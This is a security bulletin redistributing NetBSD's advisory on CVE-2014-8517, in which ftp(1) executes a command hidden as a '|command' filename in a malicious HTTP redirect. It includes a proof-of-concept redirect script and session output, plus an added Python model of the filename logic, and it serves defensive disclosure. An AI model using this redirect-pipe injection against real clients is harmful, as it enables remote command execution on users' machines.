-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2014.2029
   ftp(1) can be made to execute arbitrary commands by a malicious webserver
                               4 November 2014

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           ftp
Publisher:         NetBSD
Operating System:  NetBSD
                   UNIX variants (UNIX, Linux, OSX)
Impact/Access:     Execute Arbitrary Code/Commands -- Remote with User Interaction
Resolution:        Patch/Upgrade
CVE Names:         CVE-2014-8517

Comment: This advisory references vulnerabilities in products which run on
         platforms other than NetBSD. It is recommended that administrators
         running ftp check for an updated version of the software for their
         operating system.

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2014-013
                 =================================

Topic:          ftp(1) can be made to execute arbitrary commands by a
                malicious webserver

Version:        NetBSD-current:         source prior to Oct 27th, 2014
                NetBSD 6.1 - 6.1.5:     affected
                NetBSD 6.0 - 6.0.6:     affected
                NetBSD 5.1 - 5.1.4:     affected
                NetBSD 5.2 - 5.2.2:     affected
                pkgsrc (net/tnftp):     affected

Severity:       remote command execution

Fixed:          NetBSD-current:         Oct 26th, 2014
                NetBSD-7 branch:        Oct 26th, 2014
                NetBSD-6-0 branch:      Oct 27th, 2014
                NetBSD-6-1 branch:      Oct 27th, 2014
                NetBSD-6 branch:        Oct 27th, 2014
                NetBSD-5-2 branch:      Oct 27th, 2014
                NetBSD-5-1 branch:      Oct 27th, 2014
                NetBSD-5 branch:        Oct 27th, 2014
                pkgsrc:                 in version 20141031

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

A malicious http server can cause ftp(1) to execute arbitrary commands.
This vulnerability has been assigned CVE-2014-8517.


Technical Details
=================

If the ftp(1) program is used as an http client to fetch data from a website,
and no output file is given with the -o argument, the client can be tricked
into executing arbitrary commands.

When acting as an http client, ftp(1) follows http redirects and, unless
-o filename is specified, uses the part of the path after the last '/' of
the last resource it accessed as the output filename. Once the output
filename has been resolved, if it begins with a '|', it is passed to
popen(3) and the remainder of the name is run as a shell command. Thus, a
malicious web site could hide '|command' in a redirect and make the client
execute 'command' when ftp fetched that URL. The percent-encoding in the
redirect target (%20 in the demonstration below) is decoded before the name
is used, so the Location header need not contain a literal space.

The following session shows the attack against a vulnerable client. The
CGI script 'redirect' answers with a 302 whose Location ends in
'|uname%20-a'; the last line of output is the result of the 'uname -a'
that ftp(1) ran on the client:

a20$ pwd
/var/www/cgi-bin
a20$ ls -l
total 4
-rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
-rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a
a20$ cat redirect
#!/bin/sh
echo 'Status: 302 Found'
echo 'Content-Type: text/html'
echo 'Connection: keep-alive'
echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
echo
a20$
a20$ ftp http://localhost/cgi-bin/redirect
Trying ::1:80 ...
ftp: Can't connect to `::1:80': Connection refused
Trying 127.0.0.1:80 ...
Requesting http://localhost/cgi-bin/redirect
Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
Requesting http://192.168.2.19/cgi-bin/|uname%20-a
    32      101.46 KiB/s
32 bytes retrieved in 00:00 (78.51 KiB/s)
NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36 ADT 2014  Jared@Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIEBOARD evbarm
a20$


Solutions and Workarounds
=========================

Workaround:

Specifying an output filename with "ftp -o <filename>" circumvents the
issue, because the output name then comes from the user rather than from
the server's redirect target.
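The filename resolution described under Technical Details, and the reason the -o workaround is effective, modelled in Python as an added example. This is illustrative code written for this page, not NetBSD's fetch.c: the redirect table, the URLs and the function names are constructed for the demonstration, and the post-fix branch assumes only what the advisory states about the fix (server-chosen names never select a pipe); how the real fixed binary treats a leftover '|' name is not described in the advisory.

```python
"""Model of how ftp(1) chose its output sink before and after the
CVE-2014-8517 fix. Added illustration only; this is not NetBSD's fetch.c."""
from dataclasses import dataclass
from urllib.parse import unquote, urlsplit

# Constructed stand-in for the advisory's demo server: the URL the user
# typed answers with a 302 whose Location's last path component starts
# with '|'.  Maps url -> (status, Location header or None).
DEMO_RESPONSES = {
    "http://localhost/cgi-bin/redirect":
        (302, "http://192.168.2.19/cgi-bin/|uname%20-a"),
    "http://192.168.2.19/cgi-bin/|uname%20-a": (200, None),
}


@dataclass
class OutputSink:
    kind: str    # "popen" (run a command) or "fopen" (write a file)
    target: str  # the command line, or the file name


def final_url(start_url, responses, max_redirects=5):
    """Follow 302 Location headers the way an HTTP client does and return
    the URL of the last resource actually fetched."""
    url = start_url
    for _ in range(max_redirects):
        status, location = responses[url]
        if status != 302 or location is None:
            return url
        url = location
    raise RuntimeError("too many redirects")


def name_from_url(url):
    """The part of the path after the last '/', percent-decoded, which is
    what ftp(1) used as the output filename when no -o was given."""
    return unquote(urlsplit(url).path.rsplit("/", 1)[-1])


def choose_sink_vulnerable(user_outfile, fetched_url):
    """Pre-fix behaviour: the '|' check runs on the resolved name regardless
    of who chose it, so a server-chosen '|...' name reaches popen(3)."""
    name = user_outfile if user_outfile is not None else name_from_url(fetched_url)
    if name.startswith("|"):
        return OutputSink("popen", name[1:])
    return OutputSink("fopen", name)


def choose_sink_fixed(user_outfile, fetched_url):
    """Post-fix behaviour as the advisory describes it: only a user-supplied
    -o name may select a pipe.  Treating a server-chosen '|' name as a plain
    file is this model's assumption, not something the advisory states."""
    if user_outfile is not None:
        if user_outfile.startswith("|"):
            return OutputSink("popen", user_outfile[1:])
        return OutputSink("fopen", user_outfile)
    return OutputSink("fopen", name_from_url(fetched_url))


def fetch(start_url, user_outfile, choose_sink, responses=DEMO_RESPONSES):
    """End to end: follow redirects, then decide where the body goes."""
    return choose_sink(user_outfile, final_url(start_url, responses))


if __name__ == "__main__":
    start = "http://localhost/cgi-bin/redirect"
    print("vulnerable, no -o  :", fetch(start, None, choose_sink_vulnerable))
    print("vulnerable, with -o:", fetch(start, "/var/tmp/base.tgz", choose_sink_vulnerable))
    print("fixed, no -o       :", fetch(start, None, choose_sink_fixed))
```

The model also covers a variant the advisory's transcript does not show: a Location header that encodes the pipe itself as %7C is decoded by `name_from_url` in the same way, so filtering only a literal '|' in the redirect target would not have been a sufficient server-side or proxy-side mitigation.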
Solution:

Get a new ftp binary, with

        VERS being your NetBSD version
        DATE being a build date past the fix date for your version
        ARCH being your machine architecture

ftp -o /var/tmp/base.tgz http://nyftp.netbsd.org/pub/NetBSD-daily/VERS/DATE/ARCH/binary/sets/base.tgz
cd /
tar xzpf /var/tmp/base.tgz ./usr/bin/ftp

The -o argument is what keeps this download itself safe when it is run
with the still-vulnerable ftp binary. Alternatively, build a new ftp
binary from source.

Affected file:          src/usr.bin/ftp/fetch.c

Fixed versions:
        HEAD            1.206
        netbsd-7        1.205.4.1
        netbsd-6        1.195.2.2
        netbsd-6-1      1.195.8.1
        netbsd-6-0      1.195.6.1
        netbsd-5        1.185.6.3
        netbsd-5-2      1.185.6.2.4.1
        netbsd-5-1      1.185.14.1


Thanks To
=========

Thanks to Jared McNeill, who found the issue by code inspection, and to
Christos Zoulas for changing ftp(1) to only use | commands for user
supplied names.


Revision History
================

2014-11-03      Initial release


More Information
================

Advisories may be updated as new information becomes available.

The most recent version of this advisory (PGP signed) can be found at
  http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2014-013.txt.asc

Information about NetBSD and NetBSD security can be found at
  http://www.NetBSD.org/  and  http://www.NetBSD.org/Security/ .


Copyright 2014, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.
$NetBSD: NetBSD-SA2014-013.txt,v 1.1 2014/11/02 22:17:45 spz Exp $

- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.15 (NetBSD)

iQIcBAEBAgAGBQJUV/DOAAoJEAZJc6xMSnBuWXsP/0JHubPskhuwiD04WK3QKqxS
7pI2767yoGuXQwdzEiIYiy2h3Fu8nc/ajLEeUwBn4opEI2tXOTkspjdMO+zqFN+Z
vl53ohkfVbRu9lgNIrwhXNrdqMa4RUZDbeurjHtwL27Jie/Pn34S+F1KW3Y8HF9Z
+byMgh/NQ0MVtntekjsji1K1v2RLCeFtj/fqPNT5qS0V9Q3YAfga2k7YJLpt1gVF
ELJBXLdc9E1V0F8fmq6KMVWgAQbNOwblTsmFEJB6dzTsDq8S1uJMeiRSOxYcwIAL
0SR3por56VO+T+55cxCiE6dDgG1gXrSO/4E+Qg/7EartswwGNGCKdLL/8uouEa4z
MWVpI9n8SqcunbhOMfs6RiMvCc8IU+IZUm5oafwZg6UcgesFVv+svv5yOFEWx9Ao
WQjoUrENY04P2fDHaA8wNWOgNltTqlRlghUUd/1BFABdRdZVy9GSs4q/dFkX9u2K
O/+584pAiUPJO5TvF21GkRCWXkAx8xBXpKvIWTquIyf1zMX0YwRdLC86eLScLJX+
30pl49nJnf0QMIcucdl2BLp+XAtKAwqq4DXCS7TQHLmB2gA6QAmAR1pnjuKnPesC
AXvzXxV2+JPCQv38N7GAOYVdURObfjhiubCFErWvRkF+fv19cLYxz48knouXbOgR
WDYihwgW4aBgf6EOkXCE
=JRi/
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBVFgZOxLndAQH1ShLAQIlfA/8CYYBMZtC/r8z6F7korT8hj0NiDpzmax2
G2AZWd7MRCNXMAtBRecy798UMJG3R4JzDUIieh+dEJbaAQzOApl2nNoJjiBIda88
JrX1NV73BJGlOHJie4MYWojTUA91MT64RcnT+9g7jqIMGroxFQPmdD1mw/F2rZ+U
8rT+8+866VogAPJP+uSpQ9G2m30mp3NtW0tqSgoa2egpG4cuwSE9v/V9sUPSXDje
RFuZmDnUT1XXYQfcbKm/4eVp16R7ZYvsNaCdtihk8nIEX/tT2splfXVvY5h4sCPC
uBKosOzlAVMKz75Yc8tlhtrba+gflRlG5pLl4MCAPzfazUT999Bg0qPxinpIgFlP
N6E76bbv5JkMlUb+rPoVrQK5b8DfYBFgKIgNQhC3unVmsiH2RWd2hnJmKOeZaNXZ
of/Ma0Wts//qE/XHTtk+/ApctF0TrPQRp8mdcRkJbtU5hmsh2HSE1aEglT9+MMD6
Z/ke8wWktp8oJQOsj6hpqqA00WBTL5TAyFOheUyX7saShr+uLlkyYnoNa1L34fH6
aD7FTFCeM4p1TOR/79NndtrR9xN84x4s8kqadhy8YQlZIYZ4TcL6lRStkhiKuyBg
sdB+0QCETd26d0jtrT56wUp3g/rgxbdXC5EP85++gc/76KCAJ+8mT6x/QRDr5tl+
qDVvU4KavkA=
=bxlE
-----END PGP SIGNATURE-----